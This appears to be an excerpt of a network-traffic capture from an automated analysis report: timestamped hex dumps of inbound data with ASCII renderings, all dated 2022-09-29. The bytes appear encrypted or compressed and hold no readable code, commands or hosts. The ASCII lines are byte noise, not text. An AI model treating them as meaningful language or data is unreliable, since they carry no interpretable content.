                                                                                                                                                    2022-09-29 12:59:23 UTC32978INData Raw: 6d bc 09 43 f2 82 10 13 41 fc 87 40 2d 7c eb 8c 36 4b 93 16 a6 f6 4c ef 9f 18 ae 58 03 e8 cc 7a 2e 5f 28 d5 42 c0 4a ff 92 b0 13 36 f8 64 ee 86 6c e9 4d 85 cc 80 bb 47 a3 b2 fa 70 ec bd b0 6d 13 03 f4 80 6c 39 dc cc 5f 10 e1 2f 09 4b 67 f2 1c 2a ac cc 62 93 d3 b2 a6 3b dd 3b f3 d7 4c 68 3a 2b 63 18 ba fd fe f5 bf 6c 9a 93 29 ea 0a 61 89 06 75 84 ac 3e 43 f5 df 55 38 f4 75 73 00 6e 27 c7 22 40 b6 5e 0a 51 9e c9 c1 9c 0a 30 87 9b 98 50 90 4b 2c 12 74 f9 63 32 05 a8 99 2e cf fd 96 a8 3d 90 87 83 28 09 78 3f 20 1c 27 89 21 0d b7 a0 a2 7c 7d cc 8b e6 2a 40 6f e3 c0 61 48 79 14 13 c4 1e 1c d9 95 72 de 70 db 1f 71 30 6d bc 19 75 2d ed 15 d2 60 6c 81 80 37 01 f8 73 b3 a4 62 92 26 e3 f7 9f e3 ba 02 af 23 20 66 af 3f 57 5c f9 86 01 90 a3 b2 c7 1c ad 2e 5b ae 00 d2
                                                                                                                                                    Data Ascii: mCA@-|6KLXz._(BJ6dlMGpml9_/Kg*b;;Lh:+cl)au>CU8usn'"@^Q0PK,tc2.=(x? '!|}*@oaHyrpq0mu-`l7sb&# f?W\.[
                                                                                                                                                    2022-09-29 12:59:23 UTC32994INData Raw: 39 82 e7 f1 b2 1e 64 e7 4f 1e ed 37 75 fa 5a c5 c3 73 55 50 5d 3d 8d 08 62 6b 75 34 dc 63 54 32 2f 31 28 03 9d cc 1e 2c 8f 4b c1 29 03 28 05 8b 49 bb 16 c7 91 6e f7 e8 5d ef 0c 8a ac bf e7 27 68 cc 23 f6 77 88 73 fa 29 79 d3 06 4b 71 41 92 9b c1 d6 2f ff 73 d9 e1 60 13 ce 81 e6 b2 1d 91 a4 4b 9f ab 24 c5 a9 fd ad 7e 22 d5 a6 07 8e af cc 33 00 f6 d1 8e 98 a1 16 f2 a3 72 ed 17 4e c6 dc 3e 7d 40 ff bc 50 20 50 6f 9e 15 7d 88 0a a4 f7 33 ed 68 55 88 8d 71 d1 11 8b dc 56 5a ea 5f c3 f5 48 e5 07 37 5c 4d 7f 37 d2 73 e2 84 32 f8 26 20 79 e3 12 bf a5 d4 7c 94 9f d3 84 d4 c9 4a 46 21 bf 90 07 a4 f4 48 c2 e5 3e 94 1a de 2c c8 ea 6b 93 51 bf 2d 97 eb 5c 26 e6 43 9a 95 ee 98 b4 6b b5 a5 c5 29 89 a5 11 b8 e0 9f 99 39 de f3 d7 c7 38 17 08 26 73 cf 22 88 2f c6 cc 96 3b
                                                                                                                                                    Data Ascii: 9dO7uZsUP]=bku4cT2/1(,K)(In]'h#ws)yKqA/s`K$~"3rN>}@P Po}3hUqVZ_H7\M7s2& y|JF!H>,kQ-\&Ck)98&s"/;
                                                                                                                                                    2022-09-29 12:59:23 UTC33010INData Raw: 44 16 b5 8f 7c 92 2b db 29 22 de 8e e7 83 09 1e 48 ff 98 26 5c 9e d4 a1 8a e9 1b f6 3b 41 67 9a 59 45 fd 35 4d 26 e0 a2 39 a0 2d ed 70 56 6d 3d c5 49 bb 31 5f f0 8b 68 69 fb 5e 10 d3 1b ad 69 29 e1 77 64 a1 4c a4 38 e6 5b d7 83 33 0f e7 75 2d 0e ed 7f 7e c7 03 a7 68 ed 26 fb 7c 70 52 7e 2f d6 3a 9d 57 77 4d 5b 99 f6 3a 39 a7 a9 a1 bd ed ef 29 52 e9 c0 e9 14 c7 e3 83 02 23 eb 46 49 0c 4a 81 57 bb c5 c2 af 06 53 4b 8b ae c4 10 d8 76 b1 c2 d8 3a 25 08 82 00 36 82 85 d6 09 68 45 f1 c4 6f e9 0b 4b 8b 07 7d 18 27 bb ee 1d d1 e4 74 cc ca 95 0c 8a db d4 d7 20 2c f6 40 0a 59 c1 a3 9d 4a 20 b9 da 09 6a 49 09 fa 76 97 ef 0a 49 80 45 97 b8 40 62 7e 4b ec 23 e9 cd aa 38 6e 07 40 c3 c4 4c 60 c7 b9 ce 99 da 57 74 e4 87 0c 1c 32 63 c1 df 3e f1 87 f1 56 ce 77 7e c1 53 07
                                                                                                                                                    Data Ascii: D|+)"H&\;AgYE5M&9-pVm=I1_hi^i)wdL8[3u-~h&|pR~/:WwM[:9)R#FIJWSKv:%6hEoK}'t ,@YJ jIvIE@b~K#8n@L`Wt2c>Vw~S
                                                                                                                                                    2022-09-29 12:59:23 UTC33026INData Raw: b8 99 51 83 56 93 63 b9 3c 37 17 83 bb d4 88 a7 b3 8a d2 ce 5f 8d f8 e7 19 ec ea ea c1 20 4f 6b 2c ec b8 95 05 1c 72 88 a5 d5 45 a4 df 5f 72 0f 4b 34 82 f9 21 f9 04 d6 95 a2 1d 3b 89 0f aa 1d 02 bd 4e 7c 21 6f cc 26 f4 90 0c 20 43 f5 16 09 00 aa 7d 34 bf fd 0f 7f 0f 7e 0b dd b1 3e 7b 01 ca 18 de a2 a1 60 9f 2a e5 64 46 a1 7e dc 64 08 1f 34 a8 19 1c 6e ea 41 8f 45 fe 5b 81 87 24 6d b5 c9 df 13 7e a8 78 e7 83 59 e8 00 71 ee 47 24 01 62 3f 80 d5 d6 48 8b cf f9 ef b2 e0 f3 ed 2d 93 7e fb 8b 65 3b e3 8c b9 44 f2 cc 2a 5a 46 2c 82 65 18 21 83 89 37 6b 1b 75 de 7c b0 75 cf 64 8e 76 81 54 2b 17 b3 88 7c 1a 07 d1 45 79 ab d6 46 8d f6 b6 9f b3 53 b3 5a 63 11 2e f3 8b 3a ce 59 98 dc 88 11 20 cf 29 db 7b c4 09 92 10 71 49 8c 7b 9a 38 b1 17 4e 3c af 44 17 3b d9 6f a7
                                                                                                                                                    Data Ascii: QVc<7_ Ok,rE_rK4!;N|!o& C}4~>{`*dF~d4nAE[$m~xYqG$b?H-~e;D*ZF,e!7ku|udvT+|EyFSZc.:Y ){qI{8N<D;o
                                                                                                                                                    2022-09-29 12:59:23 UTC33042INData Raw: ce b4 e1 5e 12 0e 98 ab d4 b7 30 f0 da d1 ec dc 54 0f d6 e0 7b 87 e4 16 51 de 5f aa 73 4f df 7f 88 d0 f1 75 02 b2 b0 16 b6 cb f6 7c 58 f8 34 49 53 4e 6a 3a 59 6a a3 1c d3 55 9c 5f 49 29 9e 1c 47 6c 5d 0e f1 21 81 71 63 07 49 1e a4 4f f0 3e 10 50 b1 89 3c d5 07 09 14 31 aa 01 91 9b 87 ec 44 3a 54 bb ae 2b f6 7e d1 10 f6 f9 7c 03 41 64 c7 84 96 57 2d bd c0 76 b8 91 c8 97 e7 51 27 5e f4 57 d1 28 3e 46 1e 36 1e 07 ef 91 22 6c 42 15 2c 98 1a af 26 21 03 52 0c be a1 f9 fc 41 24 32 6b 4c 0b eb 90 ee f8 6f 34 d2 03 f9 0a 32 b7 9d ed 7f b1 be e8 74 ed 00 b5 f3 62 0a 57 c6 7d 38 ad c0 1b 59 44 d2 46 ed c9 76 0e 81 dc 5f 3a 30 69 e1 58 a5 ad 44 21 1a d2 51 bd 34 fe 07 9f 21 87 5b 6a 3a 2b 42 fa 05 c2 07 7e 22 e9 53 a8 55 ca 81 ae 7b f6 ca aa 8e b6 05 3b dc f1 0f 49
                                                                                                                                                    Data Ascii: ^0T{Q_sOu|X4ISNj:YjU_I)Gl]!qcIO>P<1D:T+~|AdW-vQ'^W(>F6"lB,&!RA$2kLo42tbW}8YDFv_:0iXD!Q4![j:+B~"SU{;I
                                                                                                                                                    2022-09-29 12:59:23 UTC33058INData Raw: 44 dc 2b 89 8d 2f 0a c1 a4 03 81 8f 50 e9 93 f9 31 3a 0e e3 25 44 c4 5e 83 65 99 78 ab 6f 65 ff 9c ca af 35 1d b5 c7 e3 3d 5d f4 f7 c4 64 97 db 7a f7 d7 4a b1 01 06 9e 26 15 65 71 3c ca 35 81 44 8e 40 2f f0 7f d0 1c ea 74 06 57 4b c2 70 c4 d7 fa 16 16 a9 76 04 71 5d 00 cc ae 06 4e 35 44 73 d5 b9 59 70 76 e6 2a f1 16 d6 1d a2 bc 27 71 29 49 4d e5 41 96 0c 99 bc a4 7f eb e7 3f b0 08 28 25 b4 c9 5c fb 4c a9 db 6b bc 3b 32 87 3a 8a c2 f9 74 2e 99 e3 84 ee 2c 95 7e e8 7e a1 57 83 89 47 4f d7 3a 8c 40 fb 47 a3 d7 d7 1d 2f 3d 8d e6 82 93 6f 68 5a 6d 86 18 17 fd 7f 1a bf 3f ab db e2 41 d0 c3 e1 c1 11 37 72 04 47 48 1b e2 f1 ad ea 03 4d 89 d7 26 bf a7 65 b5 5d f5 51 3f 4e a7 e7 31 ec 1b d5 e0 b1 af d5 4b cc 9f d4 fe c1 ca e9 55 b9 27 6b 29 8b eb cc 18 7a a1 00 f7
                                                                                                                                                    Data Ascii: D+/P1:%D^exoe5=]dzJ&eq<5D@/tWKpvq]N5DsYpv*'q)IMA?(%\Lk;2:t.,~~WGO:@G/=ohZm?A7rGHM&e]Q?N1KU'k)z
                                                                                                                                                    2022-09-29 12:59:23 UTC33074INData Raw: 3f 0e 74 c2 61 06 52 86 ac 0f ad 18 ac 71 de b8 4d 32 d5 56 78 ac 08 12 90 0d a0 60 0c 53 2d 5a bb 48 b2 f6 47 cd e9 d0 07 76 92 7a a5 b4 5a 2f 7c 51 4d a0 f5 d8 b2 be 1b 9d 62 09 22 84 c6 fd ec 0a 9f 79 52 34 bd f1 59 a6 97 cf ce 52 a9 d0 d6 cd fe 62 59 80 e7 2b 78 5f 2c 47 93 73 99 ca f5 0f 76 ae 96 56 64 2c 98 e0 ff 73 77 4a 0e a2 c0 d7 f3 ba 87 1c e0 3b f2 ce d5 fe fc 51 ba bf 11 2b 3b fe 32 6e e8 4a 74 06 4c 90 89 77 c3 ed 87 2c 45 aa f7 2f 45 d0 7b 01 82 06 37 c6 1f 55 c1 84 55 9c b9 47 7c 87 69 81 65 52 1c c8 4e 06 e6 46 a5 cb fe 2b 42 93 2b 0b 8e fd a0 7b 12 1c 47 2f 8f e5 fc 1c e8 3d 43 1c bc 98 52 a9 2c c8 ad d4 2e 7a 50 eb 76 19 1a 83 fc 68 fb 64 46 b1 e7 2a 3a aa 6c 7d c8 5b f0 bf 51 32 b9 7b 63 fd 1c 5f eb ae bf a4 77 25 65 48 d9 18 3c 57 94
                                                                                                                                                    Data Ascii: ?taRqM2Vx`S-ZHGvzZ/|QMb"yR4YRbY+x_,GsvVd,swJ;Q+;2nJtLw,E/E{7UUG|ieRNF+B+{G/=CR,.zPvhdF*:l}[Q2{c_w%eH<W
                                                                                                                                                    2022-09-29 12:59:23 UTC33090INData Raw: 14 0d ee de b4 b6 d1 9d e5 a0 f7 2e d5 bc b8 fd b2 5b 4a a3 8c 92 d4 96 5d ef 25 b4 d8 81 b1 f0 d2 e3 87 e5 b8 67 a6 e8 f5 16 2a ca ee 71 9d 21 75 e5 80 95 ad 57 1d 56 53 65 e0 ff df 2f f7 f2 96 10 59 64 8a fd c8 68 c9 b1 f0 79 d4 7f 3a ac 21 c1 25 49 29 a8 5a 91 a0 65 da 2a e0 4f 38 3a 31 a6 0b 11 1b 03 14 fb f4 a4 26 2b e5 27 3a 56 2b e2 25 2c cb af 20 0a 03 b3 99 9f 77 7d 1c c4 6e 2b 47 7d f5 80 72 d1 a7 c8 c6 73 64 d8 40 e2 ce 5e 20 f1 11 db e9 67 2d 97 3b 21 dd 3a 88 da 26 b0 2b b9 82 a6 98 6e 7a 26 25 f9 13 70 87 fd c0 17 9a 59 22 7f 94 94 c5 ef e5 98 25 a1 7d dc 89 2c b5 2a ba 4e 01 a5 4c b5 fe 47 67 72 44 d3 9c 9d 44 80 18 30 d5 3c 57 a9 64 a0 65 19 3b f4 8a 37 9e 2d 43 8c ed 56 9e 7f c3 4e 98 12 9d b6 72 44 e5 4b f3 2e 56 e9 9c 99 a8 77 ce 00 59
                                                                                                                                                    Data Ascii: .[J]%g*q!uWVSe/Ydhy:!%I)Ze*O8:1&+':V+%, w}n+G}rsd@^ g-;!:&+nz&%pY"%},*NLGgrDD0<Wde;7-CVNrDK.VwY
                                                                                                                                                    2022-09-29 12:59:23 UTC33106INData Raw: 5e d8 11 bd 35 09 19 26 75 63 dd 8b 7b e4 68 db c0 86 c5 83 92 d0 9d 3d 5f 47 39 5f 14 5c d2 03 74 fd 02 36 fb ae ee 70 08 1b 60 22 40 1a c8 3d 9e ab 00 0e e8 29 a8 da ae c3 0b 33 1f ff 70 89 16 b4 64 04 09 26 71 8d a6 fa 2a 38 2d d0 e1 6c 60 4b 88 f6 77 f1 57 87 31 7b 69 29 0e dd 6a 1d 0f 08 4d c4 90 30 64 82 0c 45 09 80 4d ed 49 9f 65 e6 a8 b0 df 75 91 14 78 96 23 f9 6c 66 17 13 93 64 2d 59 8a 94 6b 24 6a 17 fe 37 36 25 7f d3 87 d7 c0 c7 7e d9 2c 2a 8b 44 ce 83 e0 6d 7d 76 55 f7 04 ea f4 a8 66 de 14 77 58 49 be ca bd b3 c5 6a 5b 41 eb 52 3b bf f0 2e f4 29 88 b5 a8 1c 13 37 06 9d 4b b6 79 c0 c3 be 85 fb 8f 81 7a 49 3a 40 02 38 69 f6 ff b0 d1 33 3e fd 1f 53 28 98 7f 4e 01 23 00 8f 4f 49 e7 eb 70 e8 0f 40 bf 7e b3 53 b0 f8 39 4f f4 6b ba 1e 10 26 48 3d fa
                                                                                                                                                    Data Ascii: ^5&uc{h=_G9_\t6p`"@=)3pd&q*8-l`KwW1{i)jM0dEMIeux#lfd-Yk$j76%~,*Dm}vUfwXIj[AR;.)7KyzI:@8i3>S(N#OIp@~S9Ok&H=
                                                                                                                                                    2022-09-29 12:59:23 UTC33122INData Raw: dd 6e 29 e2 d9 1a 6d 60 8c 20 e8 67 0a 5c ba c8 57 47 4a 0b e4 2a 71 f7 9e a7 4c 15 0b 3f 77 09 85 f5 e7 c6 9b a1 04 75 fa 01 27 5c fc 9d 35 48 d0 ea 01 c7 56 25 3b f8 69 7d 1d ba bd 12 58 ec ef 86 db f8 e8 73 8a 51 7f b7 da 84 ec 3f f9 1a ee 64 01 67 ef 7f 38 4d c1 c7 63 88 f0 a7 bc c1 41 34 ce 92 03 bd c6 f7 8c 9b b2 7d 97 c7 d9 d6 5e c0 a9 82 7b b7 22 a8 9a 11 17 c4 a0 e4 b0 df 31 0b 5c 94 81 59 8b c9 ba 84 da 0a 86 a3 43 65 58 ec 40 9f a3 f1 8d 83 4a e0 da 46 1e 5c 34 72 4a 14 1e 4d 94 cd 96 85 0f 3e 16 ee 29 9b 1a 6b 0d 73 8c 1f ed 29 03 e5 23 3e 34 00 3c 3b ab a3 b2 2c 07 63 58 98 df 84 86 4b de 6e 34 4d bf bf f8 c9 c2 df c6 29 b7 27 49 0d 76 56 16 51 44 4a 08 f0 a0 8b 2c d9 5f f2 ff f1 cb f8 52 e0 47 c1 6a 9b 50 a2 a7 49 59 e4 2c 42 8a a2 1d 31 dc
                                                                                                                                                    Data Ascii: n)m` g\WGJ*qL?wu'\5HV%;i}XsQ?dg8McA4}^{"1\YCeX@JF\4rJM>)ks)#>4<;,cXKn4M)'IvVQDJ,_RGjPIY,B1
                                                                                                                                                    2022-09-29 12:59:23 UTC33138INData Raw: 1a 33 c2 3a c4 86 9a f1 45 dc 0a ea 3f 7d 64 97 73 0d ba a5 b5 46 1a 87 94 f7 04 86 01 92 8a 26 38 c8 9a a7 38 de c6 7b e1 91 ee 2f 78 4a fd 49 56 5a 88 e5 24 c9 69 f8 16 88 c6 b0 4c 46 be 26 c4 39 31 d4 45 e2 f9 a3 ca d4 14 98 16 6a 70 50 45 17 e4 58 32 a5 bd eb 29 35 de 32 f7 59 c9 9a 1b 28 bb 32 f6 cf 1d 93 29 52 85 90 43 c6 52 7a 7e 26 d7 86 ed 2c a3 34 70 d9 16 a2 a9 97 ef 16 d6 7f c8 46 72 03 a3 9b 61 fb 8a ef 69 66 c5 f8 77 23 80 6c 55 85 bd 90 8f 1f 96 a0 ea ae 72 94 96 d1 52 eb 9b be 69 a3 2f e8 48 bc 30 34 48 42 0f cd 52 ee 91 7a e7 10 85 aa b4 92 e9 5e 99 ca a6 d6 39 bb cf 90 bb 50 12 f0 e4 73 a4 33 8d 51 d0 d4 fc bd 05 2f 65 0e d8 ab bb b3 5f 83 c8 b2 0c 49 36 b9 03 2f 9c 32 da bc ab db 83 51 03 3a b5 dc c4 57 01 5a f3 52 52 79 87 18 e3 c1 5b
                                                                                                                                                    Data Ascii: 3:E?}dsF&88{/xJIVZ$iLF&91EjpPEX2)52Y(2)RCRz~&,4pFraifw#lUrRi/H04HBRz^9Ps3Q/e_I6/2Q:WZRRy[
                                                                                                                                                    2022-09-29 12:59:23 UTC33154INData Raw: de 67 87 f1 c0 31 b1 15 e9 08 de d0 04 15 ce ca da 6c 5a e9 3c 30 34 a7 1a 3c 71 0b d8 b6 2d 14 5e f9 de 1c c3 77 46 b0 8d 03 70 88 3d eb 27 c8 95 25 0d d6 87 79 64 f3 03 b4 0a 33 4e 6a f6 5e 67 32 19 af 27 5d 95 5b 5a 41 05 af 44 c4 e8 27 c3 29 93 41 f7 e3 d3 9d a7 9a e3 65 42 57 b2 84 aa 82 5f b5 89 ec 8f 31 84 a0 3b a2 32 49 37 dc bc ae 89 74 ec 51 ce 5a 39 f2 17 0a 07 0a ff bb 8d 87 7a d0 c7 2f 44 16 21 fb f9 83 0a f3 03 20 8e 21 ea 7b 30 d4 2f 3e 09 f5 db c8 e5 52 13 6b 00 b3 8c cb 4a 5c 5d 9a 85 84 21 0e b0 cd e1 45 f7 04 8c 94 aa 6c a2 ca e1 45 44 f9 b8 81 ed 21 3e a5 e6 11 33 c9 aa b0 02 5a 9d 0f 65 18 5f 34 96 58 0a bf 5a 98 f1 b7 2e 29 04 ac b9 ef 25 02 13 61 39 4b 41 9e 52 73 8e b8 ed bb d1 a0 9c 4d eb ae 83 d4 b5 41 c7 7d 18 c7 7f 9a a6 bf 7d
                                                                                                                                                    Data Ascii: g1lZ<04<q-^wFp='%yd3Nj^g2'][ZAD')AeBW_1;2I7tQZ9z/D! !{0/>RkJ\]!ElED!>3Ze_4XZ.)%a9KARsMA}}
                                                                                                                                                    2022-09-29 12:59:23 UTC33170INData Raw: 0e 59 e6 a5 df 5f 9c 3f 8a 99 64 95 2c 86 9f e6 c5 9e c5 b4 bc 5f 43 86 e0 37 5a 1b 14 1f bb 0c c4 66 88 29 18 15 a4 c2 ef 0f 12 d8 f0 24 a2 f7 10 68 8d 61 6c 2a da 63 50 c7 26 16 aa b9 71 ac 1e dd 46 d9 ba f5 b1 d0 dc 6a 40 c4 6c 8f 84 b3 c2 60 2f 7e ab 28 46 8a e5 ad c8 b7 f1 4e 36 55 d3 eb d3 04 db a6 25 e3 d8 f0 39 54 d4 26 17 fe 68 7e 51 57 88 91 e3 ea 16 9e 93 dd a3 f8 7f f5 43 58 3a 7d 21 52 49 01 0e cf 54 f7 97 f5 2d 7a f8 cc ed 1a bc 56 cb 04 e4 ff ba f5 f3 2f 72 7a 69 24 d3 ba 02 f3 7b 1d 4b d7 28 e5 12 38 f6 2f 8d 94 a7 26 29 ed f7 c7 b5 19 75 85 10 d0 b1 0c 78 2d 61 dc ec 2c d2 aa a3 d4 c5 f4 b7 43 5a 10 bc fb 50 19 bb 1f 32 85 f1 ed cc d9 a9 7b c9 55 da 2a 81 ba 1f 89 10 69 dd 85 74 9d b1 cf 2b c7 cf d4 a4 1f 42 de 42 ca 77 32 68 0f e4 f7 ad
                                                                                                                                                    Data Ascii: Y_?d,_C7Zf)$hal*cP&qFj@l`/~(FN6U%9T&h~QWCX:}!RIT-zV/rzi${K(8/&)ux-a,CZP2{U*it+BBw2h
                                                                                                                                                    2022-09-29 12:59:23 UTC33186INData Raw: a0 14 bb 82 e0 7c e2 a5 97 08 b5 f8 25 a6 bd 50 db 04 27 97 c2 84 da 24 96 cd 86 25 96 8b c3 fd 03 72 7e e9 00 a5 8f b7 42 7e 4e 57 7f 63 b9 c1 d0 b3 5e a7 94 1a 3d 5c dd bf c8 5b 73 7b 6e ea df 7c 4c 65 35 37 b2 fb ad 66 b3 1c e3 76 0c 9e f5 a3 6b b6 5d f9 ff 29 f5 3a b4 aa 45 3c 7e a4 f2 33 80 45 77 82 6c 77 ba a3 0c 33 7c 3a 76 54 d8 a8 36 26 53 d6 38 00 4f 2b dd ac ba 93 94 75 cc f5 14 09 e1 e0 26 5a 1e ce 12 f4 3f 71 be 64 e7 6c 23 d2 a6 47 ff 1b 1f 7e 17 cc 73 d5 ac e9 81 78 29 69 6c 1a ef 88 5c 98 34 fa 54 f6 7d 5e a0 cf 52 6c 52 79 cc 1f 23 17 4a f9 58 a3 73 39 35 36 c3 1a 2d 58 37 ff 72 a3 41 a7 c1 e6 6f 84 0b 36 c0 67 32 16 75 4b d8 31 5c 9a 85 7c a9 e0 77 fb ba d2 fe 24 22 cd 64 64 32 19 4a c0 89 99 6b 0e 07 50 53 2a a8 0a dd d2 6f f8 ee 87 87
                                                                                                                                                    Data Ascii: |%P'$%r~B~NWc^=\[s{n|Le57fvk]):E<~3Ewlw3|:vT6&S8O+u&Z?qdl#G~sx)il\4T}^RlRy#JXs956-X7rAo6g2uK1\|w$"dd2JkPS*o
                                                                                                                                                    2022-09-29 12:59:23 UTC33202INData Raw: 68 9b ea 64 b0 56 76 44 6c 27 f0 98 20 1f bd 96 33 ea 3b 73 f7 a8 69 1d a2 01 be c4 c2 5b 73 23 f8 1f 1a 68 9d aa e4 90 50 d5 84 1a a9 e0 ba a9 7f 0e 0f 9a f6 7d 4b 28 7b d2 f9 8f ce 9c b2 7f 72 54 02 1d fa e5 5b eb 4b a7 c2 de 18 af 98 f0 44 ae 59 87 fd 8b c5 e6 2d 3c ea 6c 03 1a 22 34 1c 58 13 d6 4c 1e 7d 55 ef 59 a2 95 f4 28 ea 7d 99 a9 29 2b a0 3e df ed a2 a9 c5 14 c9 0e 54 0b 03 23 ea 3a 68 1f 9c bd 0e 71 16 88 1d b9 06 1c a8 25 11 c8 c0 d4 3d 2d 7c c1 13 89 e1 ba be 31 54 58 86 2d c7 84 a1 ad 05 79 ff 1c 0e 87 e4 c6 05 01 e5 85 98 63 63 cc 91 71 aa 3d f8 83 a9 12 04 72 9c 9b ce c7 96 a0 fe b4 fa 23 04 b8 86 9a a7 40 4a 37 39 6b 82 e8 ba ab 38 d7 d0 84 ea 57 33 34 7e 65 e3 bc 0f 9c 3f 1d 59 b2 72 ec 8d ef 48 a6 c7 5a 1f 1d 43 c9 f9 e3 cb 40 e9 a2 53
                                                                                                                                                    Data Ascii: hdVvDl' 3;si[s#hP}K({rT[KDY-<l"4XL}UY(})+>T#:hq%=-|1TX-yccq=r#@J79k8W34~e?YrHZC@S
                                                                                                                                                    2022-09-29 12:59:23 UTC33218INData Raw: 11 69 2c a0 56 5c a9 ee 36 60 47 75 d1 33 df ec 3d ab b2 a1 d2 43 a2 0d 18 18 c4 c2 6f 8e 89 b1 3a de 93 57 07 eb 61 b1 7c ff b9 1a 61 a9 94 80 0d 2a 6b 8f 90 30 f3 f2 55 13 c3 5c 1e fa 9e 1c 5f 24 2b ed 1f 18 fe 5c 0f 3b 5d 41 df 19 1e 19 78 6d 2d d0 cf a7 2d 8f a8 13 cc b9 49 58 62 ee ff bf c9 6a df 51 f3 e9 20 a9 3b 8e 12 a3 ff f0 54 2b 34 ed be 6c 8c 4b 7c 87 22 13 d9 72 f4 48 46 51 c2 83 4e 17 a7 6a 68 54 22 28 8b 28 fc 21 ef c3 3d e1 90 b4 96 b4 2c 4f ae d1 99 8a f3 6a 62 ea 95 53 e5 2a 7a c4 3f 4f b3 ca 2d 50 cc b5 1a 8d 26 42 e4 83 b7 f1 7e 18 3d a5 e0 bc fd 2b ec b5 68 95 0e 43 8d fa 42 ab 25 72 a4 62 15 bd 70 f6 74 40 51 8c c4 57 0c ee 85 71 98 4d c9 3b e8 39 90 15 24 10 79 43 c3 01 fe 1a 37 2b 76 9e b3 0c dc 81 fe 3c 53 ef 4f 9b e7 47 3e e5 02
                                                                                                                                                    Data Ascii: i,V\6`Gu3=Co:Wa|a*k0U\_$+\;]Axm--IXbjQ ;T+4lK|"rHFQNjhT"((!=,OjbS*z?O-P&B~=+hCB%rbpt@QWqM;9$yC7+v<SOG>
                                                                                                                                                    2022-09-29 12:59:23 UTC33234INData Raw: e7 45 d6 3d a1 69 0f d2 94 00 02 81 c6 d3 ee fa 9b d1 30 0a 1c 48 1b 28 1a 34 bc 10 02 94 63 d7 da bd 31 0a d9 12 f1 13 c8 c8 1c d4 53 ff 25 10 3d 5b 21 c2 24 ed 32 d8 b5 4d 5b 35 36 a9 9b 53 d8 6c b7 3f 11 80 0d 25 f3 1b d3 b3 38 66 ec ff d6 79 c3 a6 2c 1a 0f 1e 11 4d a8 63 0a 3a c4 cf c8 80 bd e2 81 c0 25 d8 0c 79 2c 4a 53 12 fe d0 78 e2 02 6c 03 12 db 7c c6 b0 9a c4 c1 f1 a8 68 9f 15 f0 16 af 32 ba 31 7b 6a d1 06 bf e7 27 6f f0 24 cb 18 65 a6 20 a0 36 a7 b7 82 c3 94 4b 2f 65 47 32 fa 8a 0d b8 1a 03 b8 7f b9 a6 c3 0f 4b 57 c2 c3 4c fb 18 7c b8 f2 72 16 b7 3a 92 cb a9 92 ec 9c 5b a2 d1 bc 40 59 b2 b0 e3 9a de bd 17 81 23 a1 19 f6 02 fb 08 23 d1 f7 9a bf 48 60 82 f3 d7 4f ce 52 21 f8 67 3f a2 4f 1a bf 90 46 65 8f b6 ab 0e cf 10 a8 75 07 9e 37 1f fa ff 51
                                                                                                                                                    Data Ascii: E=i0H(4c1S%=[!$2M[56Sl?%8fy,Mc:%y,JSxl|h21{j'o$e 6K/eG2KWL|r:[@Y##H`OR!g?OFeu7Q
                                                                                                                                                    2022-09-29 12:59:23 UTC33250INData Raw: 46 c7 4f d0 45 82 b4 36 c6 96 cb f9 ca c3 5a 99 41 c9 b9 0c 49 68 65 ff 0d e8 4a 90 eb f5 67 5e 66 e9 e7 30 75 5d 7c 26 2d 02 92 0e b6 97 45 f4 99 48 03 13 43 bf 3f 21 13 a4 23 49 7b a9 a2 69 b2 2b 4a 66 51 61 26 86 29 c4 e3 94 19 48 5c 29 9f 92 02 99 13 08 e9 57 2c 3e dd 22 76 6e c1 17 63 f9 15 86 e1 2a ed ea 1d be d4 01 c0 97 6d 36 28 e7 8e b7 f6 eb 6f 03 db 62 4a 1a a2 0b 3e 5e 01 15 61 08 4b 77 84 7f e1 8f 15 97 e5 4b f8 9b 9c 93 d2 dd 54 54 a9 43 81 28 7b d2 78 1f 73 3e 61 38 c9 98 5f be cb 8f 86 38 3c 21 70 85 7c 12 18 80 f0 02 52 e7 bb 10 55 27 70 c1 95 a9 84 ea 84 8e 9d 48 f3 a8 a0 0a 1f c8 b8 7d 1f 69 58 73 89 dc 2d c2 13 03 5a 39 04 fd 72 7d c4 bc 6e 80 5e 7c f1 8d df 4a 1f e1 61 81 fc 7d 05 bb 6a 13 6d 05 88 f1 dc a4 1f 4e c5 37 71 a5 ea e2 3e
                                                                                                                                                    Data Ascii: FOE6ZAIheJg^f0u]|&-EHC?!#I{i+JfQa&)H\)W,>"vnc*m6(obJ>^aKwKTTC({xs>a8_8<!p|RU'pH}iXs-Z9r}n^|Ja}jmN7q>
                                                                                                                                                    2022-09-29 12:59:23 UTC33266INData Raw: fa 1f 1e ad 42 d5 42 f3 95 a5 e1 8e 93 57 b0 ce 7c e3 94 fd e4 a8 c8 01 f6 30 0e ae cb ca 3a 25 ec be d5 3b 21 07 02 eb 70 f9 91 70 34 53 e2 c1 e0 5f 1a fa a4 66 4b ae 84 0c 82 f4 f5 1c 74 e9 29 69 22 c3 09 3a fe 90 e4 b1 4a 55 a8 19 a1 a0 ca c3 7c 76 48 5c 7e 9c 35 fa 62 da 1c 48 33 45 4c 4a 14 c8 d6 58 ab 93 ee be cc 04 26 ef 39 15 f9 3c 0e a3 cd 6c 08 e3 63 b1 d9 d4 25 02 d3 f7 7d 43 cf aa 79 e4 17 84 90 5c 2b 36 40 ef ff e1 7e 6d b4 30 23 e3 c9 47 c1 6f db 4a 4a ed b5 8c a5 68 61 9a 4b 15 3b bd 75 c3 b6 48 8b 86 eb a7 b0 eb ce af c9 27 0d e8 67 95 af 5d 86 43 3a 7a f0 d1 84 b9 63 fe cb c0 b2 f4 d6 6f 6a 0e 39 0e 48 e6 f8 ba e7 bf 09 0a 5d be c5 fe 9d a8 2b 93 73 dc f8 eb 4d 4b 53 22 91 c5 5a 9a 95 da 23 1b 4b 61 36 77 0c 12 03 f5 43 04 61 3c c6 97 8f
                                                                                                                                                    Data Ascii: BBW|0:%;!pp4S_fKt)i":JU|vH\~5bH3ELJX&9<lc%}Cy\+6@~m0#GoJJhaK;uH'g]C:zcoj9H]+sMKS"Z#Ka6wCa<
